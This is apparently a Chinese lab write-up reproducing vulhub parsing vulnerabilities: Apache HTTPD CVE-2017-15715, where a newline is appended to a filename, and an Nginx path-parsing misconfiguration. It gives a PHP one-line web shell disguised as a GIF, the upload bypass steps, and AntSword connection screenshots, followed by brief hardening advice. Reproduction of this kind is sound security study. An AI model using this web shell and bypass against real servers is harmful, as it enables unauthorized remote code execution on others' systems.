vulhub中间件解析漏洞复现

vulhub中间件解析漏洞复现

=== shell

此环境来自vulhub工程:
https://github.com/vulhub/vulhub

以下测试环境为ubuntu 20.04


目录

  • vulhub中间件解析漏洞复现
    • Apache HTTPD 换行解析漏洞(CVE-2017-15715)
      • 漏洞原理及环境部署
      • 文件上传
      • 蚁剑直连
      • 加固
    • Nginx 解析漏洞复现
      • 环境
      • 简单getshell


Apache HTTPD 换行解析漏洞(CVE-2017-15715)

漏洞原理及环境部署

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,xxx.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

# 拉取vulhub配置
git clone https://github.com/vulhub/vulhub.git

# 切换到相应漏洞路径
cd xxx/vulhub-master/httpd/CVE-2017-15715

# docker-compose部署该漏洞环境
docker-compose up -d

文件上传

访问http://ip:8080/,只有一个文件上传框,直接上传一句话木马

GIF89a<?=eval($_POST["root"]);?>

然后抓包
vulhub中间件解析漏洞复现_第1张图片
打开hex表,找到shell.php哪一行,右键0d选择插入byte
vulhub中间件解析漏洞复现_第2张图片
写入0a,然后确定
vulhub中间件解析漏洞复现_第3张图片
访问shell.php%0a,确认是否能解析
vulhub中间件解析漏洞复现_第4张图片

蚁剑直连

vulhub中间件解析漏洞复现_第5张图片

加固

  • 别使用版本为2.4.0~2.4.29的Apache中间件
  • Apache源码修改(不至于,不至于…)

Nginx 解析漏洞复现

该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞,在上传图片路径后加上/.php就会当成php解析

环境

# 开之前记得关80端口服务,不然可能会出现端口占用的问题
cd nginx/nginx_parsing_vulnerability/

# docker启动
docker-compose up -d

简单getshell

上传一张图片马,根据图片路径访问http://your-ip/uploadfiles/23c6161c5b4dafe8becc8e29452f00b2.jpg/.php
vulhub中间件解析漏洞复现_第6张图片

会发现被解析成php,蚁剑直连
vulhub中间件解析漏洞复现_第7张图片

你可能感兴趣的:(日常练习,漏洞复现,安全,中间件,apache,nginx)